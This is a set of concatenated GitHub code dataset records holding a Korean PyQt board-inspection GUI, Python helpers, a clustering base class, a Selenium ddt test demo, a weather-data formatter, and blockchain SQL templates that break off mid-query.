self.workorder.get_current_text())\n result = self.sqldatabase.select_today_table()\n self.today_inspection = result[len(result)-1]\n self.boardDefectDetect.today_inspection_change(self.today_inspection)\n def clicked_button(self, button, is_start, commit = None):\n\n if button.text() == \"네\":\n commit_data = self.boardDefectDetect.sqldatabase.select_commit_table(self.workorder_item.get_workorder_id(),self.workorder.get_current_text())\n print(commit_data)\n \n if commit_data :\n self.start_start_message_box(commit_data[0])\n else :\n if not self.boardDefectDetect.get_working():\n if self.boardDefectDetect.is_post == True:\n self.init_json()\n self.inspection_start_time.setText(get_datetime())\n self.create_table()\n else:\n\n if self.boardDefectDetect.today_inspection[1]=='':\n self.inspection_start_time.setText(get_datetime())\n self.boardDefectDetect.start()\n self.inspection_start_btn.setText(\"검사중..\")\n self.camera_view_button.setEnabled(False)\n self.inspection_start_btn.setEnabled(False)\n self.inspection_stop_btn.setEnabled(True)\n #self.start_start_message_box()\n elif button.text() == \"확인\":\n if not self.boardDefectDetect.get_working():\n self.boardDefectDetect.sqldatabase.update_commit_table(commit[0])\n self.ui_value_change(commit, False)\n self.boardDefectDetect.init_value_change(commit)\n if self.boardDefectDetect.today_inspection[1]=='':\n self.inspection_start_time.setText(get_datetime())\n self.boardDefectDetect.start()\n self.inspection_start_btn.setText(\"검사중..\")\n self.camera_view_button.setEnabled(False)\n self.inspection_start_btn.setEnabled(False)\n self.inspection_stop_btn.setEnabled(True)\n elif button.text() == \"새로 시작\":\n if not self.boardDefectDetect.get_working():\n self.boardDefectDetect.sqldatabase.update_commit_table(commit[0])\n \n if self.boardDefectDetect.today_inspection[1]=='':\n self.inspection_start_time.setText(get_datetime())\n self.boardDefectDetect.start()\n self.inspection_start_btn.setText(\"검사중..\")\n self.camera_view_button.setEnabled(False)\n self.inspection_start_btn.setEnabled(False)\n self.inspection_stop_btn.setEnabled(True)\n elif button.text() == \"종료\":\n self.stop_stop_message_box()\n \n elif button.text() == \"일시정지\":\n if self.boardDefectDetect.get_working():\n\n self.boardDefectDetect.stop(self.get_inspection_json(),False)\n self.inspection_start_btn.setText(\"검사 시작\")\n self.camera_view_button.setEnabled(True)\n self.inspection_start_btn.setEnabled(True)\n self.inspection_stop_btn.setEnabled(False)\n elif button.text() == \"완료\":\n if self.boardDefectDetect.get_working():\n self.inspection_stop_time.setText(get_datetime())\n self.boardDefectDetect.stop(self.get_inspection_json(),True, self.inspection_stop_time.text(),True)\n self.inspection_start_btn.setText(\"검사 시작\")\n self.camera_view_button.setEnabled(True)\n self.inspection_start_btn.setEnabled(True)\n self.inspection_stop_btn.setEnabled(False)\n elif button.text() == \"저장\":\n if self.boardDefectDetect.get_working():\n self.inspection_stop_time.setText(get_datetime())\n self.boardDefectDetect.stop(self.get_inspection_json(),True, self.inspection_stop_time.text(),False)\n self.inspection_start_btn.setText(\"검사 시작\")\n self.camera_view_button.setEnabled(True)\n self.inspection_start_btn.setEnabled(True)\n self.inspection_stop_btn.setEnabled(False)\n def start_message_box(self):\n msgBox = QMessageBox()\n \n msgBox.setText(\"선택한 항목으로 검사를 시작하겠습니까?\")\n msgBox.setStyleSheet(\"font-size: 28px;\")\n msgBox.setWindowTitle(\"Start\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n\n msgBox.setMinimumSize(500, 500)\n \n yes_button = msgBox.button(QMessageBox.No)\n yes_button.setText(\"네\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, True))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.Yes)\n no_button.setText(\"아니오\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, True))\n no_button.setContentsMargins(100,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n \n msgBox.exec_()\n def start_start_message_box(self, commit_data):\n msgBox = QMessageBox()\n \n msgBox.setText(f'{commit_data[5]} 날짜로 해당 작지 품목의 이전 검사가 남아있습니다. 이어서 진행하시겠습니까?')\n msgBox.setStyleSheet(\"font-size: 28px;\")\n msgBox.setWindowTitle(\"Start\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No)\n\n msgBox.setMinimumSize(500, 500)\n \n yes_button = msgBox.button(QMessageBox.No)\n yes_button.setText(\"확인\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, True, commit_data))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.Yes)\n no_button.setText(\"새로 시작\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, True, commit_data))\n no_button.setContentsMargins(100,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n msgBox.exec_()\n def stop_stop_message_box(self):\n msgBox = QMessageBox()\n msgBox.setText(\"해당 작업품목의 검사 진행을 완료하였으면 '완료'를, 검사가 남아있는 경우 '저장'을 눌러주세요. \")\n msgBox.setStyleSheet(\"font-size: 28px;\")\n # stop_text = \"
해당 보드의 검사를 끝내길 원하시면 '종료'를, 검사가 남아있는 경우 '저장'을 눌러주세요.
\"\n # msgBox.setText(stop_text)\n\n msgBox.setWindowTitle(\"Stop\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)\n\n msgBox.setMinimumSize(500, 500)\n\n yes_button = msgBox.button(QMessageBox.Cancel)\n yes_button.setText(\"완료\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, False))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.No)\n no_button.setText(\"저장\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, False))\n no_button.setContentsMargins(0,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n\n cancel_button = msgBox.button(QMessageBox.Yes)\n cancel_button.setText(\"취소\")\n cancel_button.setIcon(QIcon())\n cancel_button.clicked.connect(lambda: self.clicked_button(cancel_button, False))\n cancel_button.setContentsMargins(0,20,0,0)\n cancel_button.setStyleSheet(\"font-size: 24px;\")\n cancel_button.setFixedSize(120,50)\n msgBox.exec_()\n def stop_message_box(self):\n msgBox = QMessageBox()\n stop_text = \"
검사를 종료하시겠습니까?

* 검사 종료 후 검사 결과는 MES 서버로 전송됩니다.
\"\n msgBox.setText(stop_text)\n\n msgBox.setWindowTitle(\"Stop\")\n msgBox.setStandardButtons(QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)\n\n msgBox.setMinimumSize(500, 500)\n\n yes_button = msgBox.button(QMessageBox.Cancel)\n yes_button.setText(\"종료\")\n yes_button.setIcon(QIcon())\n yes_button.clicked.connect(lambda: self.clicked_button(yes_button, False))\n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n no_button = msgBox.button(QMessageBox.No)\n no_button.setText(\"일시정지\")\n no_button.setIcon(QIcon())\n no_button.clicked.connect(lambda: self.clicked_button(no_button, False))\n no_button.setContentsMargins(0,20,0,0)\n no_button.setStyleSheet(\"font-size: 24px;\")\n no_button.setFixedSize(120,50)\n\n cancel_button = msgBox.button(QMessageBox.Yes)\n cancel_button.setText(\"취소\")\n cancel_button.setIcon(QIcon())\n cancel_button.clicked.connect(lambda: self.clicked_button(cancel_button, False))\n cancel_button.setContentsMargins(0,20,0,0)\n cancel_button.setStyleSheet(\"font-size: 24px;\")\n cancel_button.setFixedSize(120,50)\n msgBox.exec_()\n\n def close_message_box(self):\n msgBox = QMessageBox()\n msgBox.setText(\"검사 진행중입니다.\\n 프로그램 종료를 원하시면 검사 종료 버튼을 눌러주세요.\")\n msgBox.setStyleSheet(\"font-size: 28px;\")\n msgBox.setWindowTitle(\"Close\")\n msgBox.setStandardButtons(QMessageBox.Yes)\n\n msgBox.setMinimumSize(500, 500)\n\n yes_button = msgBox.button(QMessageBox.Yes)\n yes_button.setText(\"네\")\n yes_button.setIcon(QIcon())\n \n yes_button.setContentsMargins(0,20,0,0)\n yes_button.setStyleSheet(\"font-size: 24px;\")\n yes_button.setFixedSize(120,50)\n\n \n msgBox.exec_()\n def on_inspection_start(self):\n self.start_message_box()\n\n def on_inspection_stop(self):\n self.stop_message_box()\n \n def closeEvent(self, event):\n if self.boardDefectDetect.get_working():\n self.close_message_box()\n event.ignore()\n else:\n self.boardDefectDetect.sqldatabase.close_db()\n event.accept()\n\n def on_defect_show(self):\n # self.stackedWidget.setCurrentIndex(0)\n self.boardDefectDetect.del_defect_show_list()\n if self.boardDefectDetect.defect_show_list:\n\n self.defect_img_label.setPixmap(self.boardDefectDetect.defect_show_list[0])\n else:\n self.stackedWidget.setCurrentIndex(0)\n def keyPressEvent(self,event):\n if event.key() == Qt.Key_B:\n self.boardDefectDetect.del_defect_show_list()\n if self.boardDefectDetect.defect_show_list:\n\n self.defect_img_label.setPixmap(self.boardDefectDetect.defect_show_list[0])\n else:\n self.stackedWidget.setCurrentIndex(0)\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n win = Main()\n win.show()\n sys.exit(app.exec_())\n","repo_name":"dtriple-team/mjai","sub_path":"mj_qt_main.py","file_name":"mj_qt_main.py","file_ext":"py","file_size_in_byte":27068,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21670111708","text":"from os import path\nfrom typing import TextIO, Dict, AnyStr, Any\nfrom collections.abc import Sequence\n\nfrom tabulate import tabulate\n\n\ndef format_print(output):\n if isinstance(output, str):\n print(output)\n elif isinstance(output, Sequence) and isinstance(output[1], dict):\n headers = list(map(str, output[0].keys()))\n data = [list(map(str, x.values())) for x in output]\n print(tabulate(data, headers=headers))\n elif isinstance(output, dict) and len(output.keys()) == 1:\n k = list(output.keys())[0]\n print('{0}:'.format(k))\n for k, v in iter(output[k].items()):\n print('\\t{0}: {1}'.format(k, v))\n print('\\n')\n else:\n print('Object not matched in format_print')\n print(str(output))\n\nclass safe_open:\n def __init__(self, fpath):\n self.fpath: str = fpath\n self.f: TextIO = None\n def __enter__(self):\n dir = path.dirname(self.fpath)\n if not path.exists(dir):\n path.mkdir(dir)\n self.f = open(self.fpath, 'x')\n return self.f\n def __exit__(self, type, value, traceback):\n self.f.close()\n","repo_name":"RyanJarv/orgmanager","sub_path":"orgmanager/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"16303911320","text":"import numpy as np\nfrom uids.utils.Logger import Logger as log\nfrom abc import abstractmethod\nfrom sklearn.metrics.pairwise import *\nfrom uids.v2.set_metrics import ABOD\n\n\nclass ClusterBase:\n\n __valid_similarity_metrics = {\n 'ABOD',\n 'euclidean_to_mean', # samples to set_mean < thresh\n 'cosine_to_mean', # samples to set_mean < thresh\n 'euclidean_mean', # average distance to set < thresh\n 'cosine_mean' # average distance to set < thresh\n }\n\n # ========= internal representation\n data = np.array([])\n\n def __init__(self):\n pass\n\n def get_data(self):\n return self.data\n\n @abstractmethod\n def update(self, samples):\n \"\"\"\n Specifies how to update self.data with incomming samples\n \"\"\"\n raise NotImplementedError(\"Implement Cluster Update.\")\n\n def cluster_type(self):\n \"\"\"\n Return the name of the cluster type\n e.g. return \"HullCluster\"\n \"\"\"\n return self.__class__.__name__\n\n # ------------------ set similarity metrics\n\n def set_similarity_score(self, samples, metric):\n \"\"\"\n Calculate a single set similarity score\n :param samples:\n :param metric:\n :return:\n \"\"\"\n raise ValueError('Not implemented yet!')\n\n def sample_set_similarity_scores(self, samples, metric):\n \"\"\"\n Calculate a sample wise set similarity score\n :param samples:\n :param metric:\n :return:\n \"\"\"\n\n if len(self.data) == 0:\n raise ValueError(\"Classifier has not been fitted yet. Use 'partial_fit(samples)' first!\")\n\n # calculate sample-wise to-set similarity\n if metric == 'ABOD':\n # needs at least 3 points\n if len(self.data) < 3:\n raise ValueError(\"ABOD calculation needs at least 3 fitted samples!\")\n return ABOD.get_score(samples, reference_set=self.data)\n elif metric == 'euclidean_to_mean':\n return self.class_mean_dist(samples, metric='euclidean')\n elif metric == 'cosine_to_mean':\n return self.class_mean_dist(samples, metric='cosine')\n elif metric == 'euclidean_mean':\n return self.mean_dist(samples, metric='euclidean')\n elif metric == 'cosine_mean':\n return self.mean_dist(samples, metric='cosine')\n else:\n raise ValueError(\"Invalid metric. Select from: {}\".format(self.__valid_similarity_metrics))\n\n # ------------------ general metrics\n\n def mean_dist(self, samples, metric='cosine'):\n \"\"\"\n :param samples: test samples\n :param metric: distance metric\n :return: Average distance between class and sample data\n \"\"\"\n dist = np.mean(pairwise_distances(samples, self.data, metric=metric), axis=1)\n if metric == 'euclidean':\n dist = np.square(dist)\n return dist\n\n def class_mean_dist(self, samples, metric='cosine'):\n \"\"\"\n :param samples: test samples\n :param metric: distance metric\n :return: Distance to class mean for every sample\n \"\"\"\n class_mean = np.mean(self.data, axis=0)\n dist = pairwise_distances(class_mean.reshape(1, -1), samples, metric=metric)[0]\n if metric == 'euclidean':\n dist = np.square(dist)\n return dist\n\n def mean(self):\n if len(self.data) > 0:\n return np.mean(self.data, axis=0).reshape(1, -1)\n else:\n return None\n","repo_name":"alialavia/UserIdentification","sub_path":"uids/uids/data_models/ClusterBase.py","file_name":"ClusterBase.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"41815809442","text":"\"\"\"\nExercise 9.1. Write a program that reads words.txt and prints only the words with more than 20\ncharacters (not counting whitespace).\n\"\"\"\n\nfp=open('E:\\projects\\practice-python\\interviews\\/thinkpython\\words.txt','r')\nfor line in fp.readlines():\n if len(str(line)) > 20:\n print(line)\nfp.close()\n","repo_name":"samperay/pycodes","sub_path":"pybooks/thinkpython/ex9.1.py","file_name":"ex9.1.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"70093895553","text":"'''\n UnitTest中的ddt数据驱动应用\n 环境部署:\n pip install ddt\n ddt模块所有的内容都是基于装饰器的形态来实现补充的。\n 一定要在调用ddt的类中声明ddt的调用,也就是在class前面加入@ddt\n 在需要调用数据驱动的用例前,调用@data,实现数据的驱动分离\n file_data用于处理yaml格式的文件\n yaml格式的数据驱动管理时一个yaml对应一条用例\n'''\nimport unittest\nfrom ddt import ddt, file_data, data, unpack\nfrom python_test.excel.excel_driver.web_keys import WebKeys\n\n\ndef read_file():\n li = []\n file = open('data/1.txt', 'r', encoding='utf-8')\n for line in file.readlines():\n li.append(line)\n file.close()\n return li\n\n\n@ddt # 声明该class将要调用ddt模块进行数据管理\nclass UnitDemo(unittest.TestCase):\n def setUp(self) -> None:\n self.wk = WebKeys('Edge')\n\n def tearDown(self) -> None:\n self.wk.quit()\n\n '''\n data执行的操作就是拆包\n @data('111','222','333')\n 将所有数据进行分割:\n 111\n 222\n 333\n 基于拆分出来的结果总数,定义循环次数,每次循环都传入一个参数进去\n 当需要传入多个参数的时候,所以需要二次解包\n '''\n\n # @data('python', 'mandy')\n # # data传入数据,多个参数传入元组,或者数列,或者字典,unpack解包元组按顺序传入\n # def test_01(self, text):\n # self.wk.visit('http://www.baidu.com')\n # self.wk.input('id', 'kw', text)\n # self.wk.click('id', 'su')\n # self.wk.sleep(3)\n #\n # @data(('python', 'su'), ('java', 'su'))\n # @unpack\n # # data传入数据,多个参数传入元组,或者数列,或者字典,unpack解包元组按顺序传入\n # def test_02(self, text, ttt):\n # self.wk.visit('http://www.baidu.com')\n # self.wk.input('id', 'kw', text)\n # self.wk.click('id', ttt)\n # self.wk.sleep(3)\n #\n # 基于文件的内容度,实现数据驱动\n # @data(*read_file())\n # def test_02(self, name):\n # print(name)\n #\n #\n @file_data('./data/test_data.yaml')\n def test_03(self, **kwargs):\n self.wk.visit(kwargs['url'])\n self.wk.input(**kwargs['input'])\n self.wk.click(**kwargs['click'])\n self.wk.sleep(3)\n\n\n\n\nif __name__ == '__main__':\n unittest.main\n","repo_name":"ttt01007/Python","sub_path":"python_02_selenium/class12_ddt_yaml/unit_demo_copy.py","file_name":"unit_demo_copy.py","file_ext":"py","file_size_in_byte":2486,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"15530046738","text":"import datetime\nfrom concurrent import futures\nfrom typing import Any\nfrom datetime import datetime\nimport requests\nfrom PyQt5.QtGui import QPixmap\n\n\nclass FormatDataHelper:\n\n @staticmethod\n def extract_coord(data: dict) -> Any:\n \"\"\"\n This method extracts the coordinates of the city the client is searching information about.\n :param data: A dict of the data to be filtered.\n :return: The method returns a dict of the longitude and latitude\n \"\"\"\n try:\n coordinates = data[\"coord\"]\n return coordinates\n except Exception as exception:\n print(\"[FormatDataHelper] - extract_coord method error traceback : {}\".format(exception))\n return None\n\n @staticmethod\n def format_time(unix_time: int) -> Any:\n \"\"\"\n This method converts the unix timestamp into a readable date.\n :param unix_time: The number of seconds that have elapsed since the Unix epoch\n :return: The method returns a string of the current date\n \"\"\"\n try:\n time = datetime.fromtimestamp(unix_time).strftime('%H:%M:%S ~ %d-%m-%Y')\n return time\n except Exception as exception:\n print(\"[FormatDataHelper] - format_time method error traceback : {}\".format(exception))\n return None\n\n @staticmethod\n def format_temp(temp: int) -> str:\n \"\"\"\n This method formats the given value to celsius format\n :param temp: A int value of the temperature.\n :return: A string representation of the temperature with celsius format.\n \"\"\"\n return str(round(temp)) + \"°C\"\n\n @staticmethod\n def format_proc(temp: int) -> str:\n \"\"\"\n This method formats the value to a percentage format.\n :param temp: A int value to be formatted.\n :return: A string representation of the value with percentage format.\n \"\"\"\n return str(round(temp)) + \"%\"\n\n @staticmethod\n def get_image(url: str):\n \"\"\"\n This method fetches a single image from url. This method is blocking.\n :param url: A string containing a url.\n :return: A QPixmap object.\n \"\"\"\n response = requests.get(url)\n if response.status_code == 200:\n image_data = response.content\n pixmap = QPixmap()\n pixmap.loadFromData(image_data)\n return pixmap\n return None\n\n @staticmethod\n def get_images(urls: list) -> list:\n \"\"\"\n This method fetches from the given urls list the images as QPixmap. It is build to be asynchronous.\n :param urls: A list of urls to be fetched.\n :return: A list of QPixmap objects.\n \"\"\"\n with futures.ThreadPoolExecutor(max_workers=10) as e:\n fs = [\n e.submit(lambda: requests.get(url)) for url in urls\n ]\n results = [\n f.result() for f in fs\n ]\n\n def build_pixmap(response):\n if response.status_code == 200:\n image_data = response.content\n pixmap = QPixmap()\n pixmap.loadFromData(image_data)\n return pixmap\n return list(map(lambda x: build_pixmap(x), results))\n\n @staticmethod\n def filter_data(data: dict) -> Any:\n \"\"\"\n This method extracts from the main dictionary the main data used in the app.\n :param data: A dict of the data to be filtered.\n :return: The method returns a dict of the relevant data.\n \"\"\"\n try:\n filtered_data: dict = {\"timezone\": data[\"timezone\"], \"timezone_offset\": data[\"timezone_offset\"],\n \"current\": data[\"current\"], \"daily\": [], \"hourly\": [], \"lat\": data[\"lat\"],\n \"lon\": data[\"lon\"], \"city\": data[\"city\"] if \"city\" in data.keys() else None}\n\n hourly: list = data[\"hourly\"]\n daily: list = data[\"daily\"]\n\n # Extract data for current representation\n filtered_data[\"current\"][\"time\"] = FormatDataHelper.format_time(filtered_data[\"current\"][\"dt\"])\n filtered_data[\"current\"][\"humidity\"] = FormatDataHelper.format_proc(filtered_data[\"current\"][\"humidity\"])\n filtered_data[\"current\"][\"clouds\"] = FormatDataHelper.format_proc(filtered_data[\"current\"][\"clouds\"])\n filtered_data[\"current\"][\"pressure\"] = str(filtered_data[\"current\"][\"pressure\"]) + \"hPa\"\n filtered_data[\"current\"][\"visibility\"] = str(filtered_data[\"current\"][\"visibility\"] / 1000) + \"km\"\n filtered_data[\"current\"][\"wind_speed\"] = str(round(filtered_data[\"current\"][\"wind_speed\"], 1)) + \"m/s\"\n filtered_data[\"current\"][\"feels_like\"] = FormatDataHelper.format_temp(\n filtered_data[\"current\"][\"feels_like\"])\n filtered_data[\"current\"][\"weather\"][0][\"icon\"] = \"http://openweathermap.org/img/wn/{}.png\" \\\n .format(filtered_data[\"current\"][\"weather\"][0][\"icon\"])\n filtered_data[\"current\"].pop(\"dt\", None)\n\n # Extract data for hourly representation\n for item in hourly[:10]:\n tmp_time = FormatDataHelper.format_time(item[\"dt\"])\n tmp_icon_uri = \"http://openweathermap.org/img/wn/{}.png\".format(item[\"weather\"][0][\"icon\"])\n tmp_temperature = item[\"temp\"]\n tmp_description = item[\"weather\"][0][\"main\"]\n\n item = {\n \"time\": tmp_time,\n \"icon\": tmp_icon_uri,\n \"temperature\": round(tmp_temperature),\n \"description\": tmp_description\n }\n\n # Append json object to new list\n filtered_data[\"hourly\"].append(item)\n\n # Extract data for daily representation\n for daily_item in daily[:3]:\n tmp_min_temp = daily_item[\"temp\"][\"min\"]\n tmp_max_temp = daily_item[\"temp\"][\"max\"]\n tmp_icon_uri = \"http://openweathermap.org/img/wn/{}.png\".format(daily_item[\"weather\"][0][\"icon\"])\n tmp_time = FormatDataHelper.format_time(daily_item[\"dt\"])\n tmp_description = daily_item[\"weather\"][0][\"main\"]\n\n daily_item = {\n \"time\": tmp_time,\n \"icon\": tmp_icon_uri,\n \"min_temp\": round(tmp_min_temp),\n \"max_temp\": round(tmp_max_temp),\n \"description\": tmp_description\n }\n\n # Append json object to new list\n filtered_data[\"daily\"].append(daily_item)\n return filtered_data\n except Exception as exception:\n print(\"[FormatDataHelper] - filter_data method error traceback : {}\".format(exception))\n return None\n","repo_name":"sgabriel190/weather-desktop-app","sub_path":"app/DataHelper.py","file_name":"DataHelper.py","file_ext":"py","file_size_in_byte":6859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"12149209093","text":"from jinja2 import Template\n\nREAD_BLOCK_TEMPLATE = Template(\n \"\"\"\nSELECT\n min(block_timestamp) AS min_st,\n max(block_timestamp) AS max_st,\n sum(tx_count) AS block_txs\nFROM (\n SELECT DISTINCT\n block_timestamp, blknum, tx_count\n FROM\n \"{{chain}}\".blocks\n WHERE\n blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n) _\n \"\"\"\n)\n\nREAD_TRACE_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address,\n (CASE status WHEN 1 THEN round(value) ELSE 0 END)::text AS value,\n trace_address, status\nFROM\n \"{{chain}}\".traces\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND trace_type <> 'reward' -- use block_rewards instead\n AND (call_type is null OR call_type NOT IN ('callcode', 'staticcall', 'delegatecall'))\n AND from_address is not null\n AND to_address is not null\n AND trace_address <> '[]'\n\nUNION ALL\n\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address,\n COALESCE(to_address, receipt_contract_address) AS to_address,\n round(CASE receipt_status WHEN null THEN value WHEN 1 THEN value ELSE 0 END)::text AS value,\n '[]'::text AS trace_address, receipt_status AS status\nFROM\n \"{{chain}}\".txs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND from_address is not null\n\"\"\"\n)\n\nREAD_TX_AS_TRACE_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address,\n COALESCE(to_address, receipt_contract_address) AS to_address,\n round(CASE receipt_status WHEN null THEN value WHEN 1 THEN value ELSE 0 END)::text AS value,\n receipt_status AS status\nFROM\n \"{{chain}}\".txs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND from_address is not null\n\"\"\"\n)\n\nREAD_TX_TEMPLATE = Template(\n \"\"\"\nSELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address,\n round(value)::text AS value,\n round(\n receipt_gas_used::numeric\n *\n COALESCE(receipt_effective_gas_price, gas_price)::numeric\n )::text AS fee_value\nFROM\n \"{{chain}}\".txs\nWHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n{%- if chain == 'cronos' %}\n AND receipt_gas_used is not null\n{%- endif -%}\n\"\"\"\n)\n\nREAD_FULL_TRACE_TEMPLATE = Template(\n \"\"\"\nWITH txs AS (\n SELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address, value,\n receipt_gas_used AS gas_used, receipt_effective_gas_price AS gas_price\n FROM\n \"{{chain}}\".txs\n WHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND txhash is not null\n),\ntraces AS (\n SELECT DISTINCT\n _st, _st_day, blknum, txhash, txpos, from_address, to_address, value, trace_address, status\n FROM\n \"{{chain}}\".traces\n WHERE\n block_timestamp >= '{{st_timestamp}}' AND block_timestamp <= '{{et_timestamp}}'\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n AND trace_type <> 'reward' -- use block_rewards instead\n AND (call_type is null OR call_type NOT IN ('callcode', 'staticcall', 'delegatecall'))\n),\nblock_rewards AS (\n SELECT\n *\n FROM\n \"{{chain}}\".block_rewards\n WHERE\n _st_day IN (\n {%- for d in dates -%}'{{d}}'{%- if not loop.last -%}, {% endif -%}{%- endfor -%}\n )\n AND blknum >= {{st_blknum}} AND blknum <= {{et_blknum}}\n),\nminer_stats AS (\n SELECT\n _st,\n _st_day,\n blknum,\n miner AS address,\n reward AS value\n FROM\n block_rewards\n UNION ALL\n SELECT\n _st,\n _st_day,\n blknum,\n uncle0_miner AS address,\n uncle0_reward AS value\n FROM\n block_rewards\n UNION ALL\n SELECT\n _st,\n _st_day,\n blknum,\n uncle1_miner AS address,\n uncle1_reward AS value\n FROM\n block_rewards\n),\ncnb_stats AS (\n SELECT\n address AS cnb_address,\n count(distinct blknum) AS cnb_blocks,\n count(*) AS cnb_txs,\n count(*) AS cnb_xfers,\n min(_st) AS cnb_1th_st,\n max(_st) AS cnb_nth_st,\n sum(value) AS cnb_value,\n min(blknum) AS cnb_1th_blknum,\n max(blknum) AS cnb_nth_blknum,\n min(_st_day) AS cnb_1th_st_day,\n max(_st_day) AS cnb_nth_st_day\n FROM\n miner_stats\n GROUP BY\n 1\n),\nvin_stats AS (\n SELECT\n to_address AS vin_address,\n count(distinct blknum) AS vin_blocks,\n count(distinct txhash) AS vin_txs,\n count(*) AS vin_xfers,\n sum(CASE status WHEN 1 THEN value ELSE 0 END) AS vin_value,\n min(_st) AS vin_1th_st,\n max(_st) AS vin_nth_st,\n min(blknum) AS vin_1th_blknum,\n max(blknum) AS vin_nth_blknum,\n min(_st_day) AS vin_1th_st_day,\n max(_st_day) AS vin_nth_st_day\n FROM\n traces\n GROUP BY\n 1\n),\nfee_stats AS (\n SELECT\n from_address AS out_address,\n sum(gas_used * gas_price::numeric) AS fee_value\n FROM\n txs\n GROUP BY\n 1\n),\nout_stats AS (\n SELECT\n A.from_address AS out_address,\n count(distinct A.blknum) AS out_blocks,\n count(distinct A.txhash) AS out_txs,\n count(*) AS out_xfers,\n sum(CASE A.status WHEN 1 THEN A.value ELSE 0 END) AS out_value,\n min(A._st) AS out_1th_st,\n max(A._st) AS out_nth_st,\n min(A.blknum) AS out_1th_blknum,\n max(A.blknum) AS out_nth_blknum,\n min(A._st_day) AS out_1th_st_day,\n max(A._st_day) AS out_nth_st_day\n FROM\n traces A\n LEFT JOIN txs B ON\n A.txhash = B.txhash\n GROUP BY\n 1\n),\ninout_flows AS (\n SELECT\n COALESCE(A.cnb_address, B.vin_address, C.out_address) AS address,\n A.*,\n B.*,\n C.*,\n D.fee_value\n FROM\n cnb_stats A\n FULL JOIN vin_stats B ON A.cnb_address = B.vin_address\n FULL JOIN out_stats C ON A.cnb_address = C.out_address\n LEFT JOIN fee_stats D ON C.out_address = D.out_address\n)\n\n-- FULL JOIN may return multi columns for the same address(_st_day maybe null)\nSELECT\n address, blknum,\n out_blocks, vin_blocks, cnb_blocks,\n out_txs, vin_txs, cnb_txs,\n out_xfers, vin_xfers, cnb_xfers,\n out_value::TEXT AS out_value,\n vin_value::TEXT AS vin_value,\n cnb_value::TEXT AS cnb_value,\n fee_value::TEXT AS fee_value,\n out_1th_st, vin_1th_st, cnb_1th_st, out_nth_st, vin_nth_st, cnb_nth_st,\n out_1th_blknum, vin_1th_blknum, cnb_1th_blknum, out_nth_blknum, vin_nth_blknum, cnb_nth_blknum,\n out_1th_st_day, vin_1th_st_day, cnb_1th_st_day, out_nth_st_day, vin_nth_st_day, cnb_nth_st_day,\n (vin_value + cnb_value - out_value - fee_value)::TEXT AS value\nFROM (\n SELECT\n address,\n {{et_blknum}} AS blknum,\n\n sum(COALESCE(out_blocks, 0))::BIGINT AS out_blocks,\n sum(COALESCE(vin_blocks, 0))::BIGINT AS vin_blocks,\n 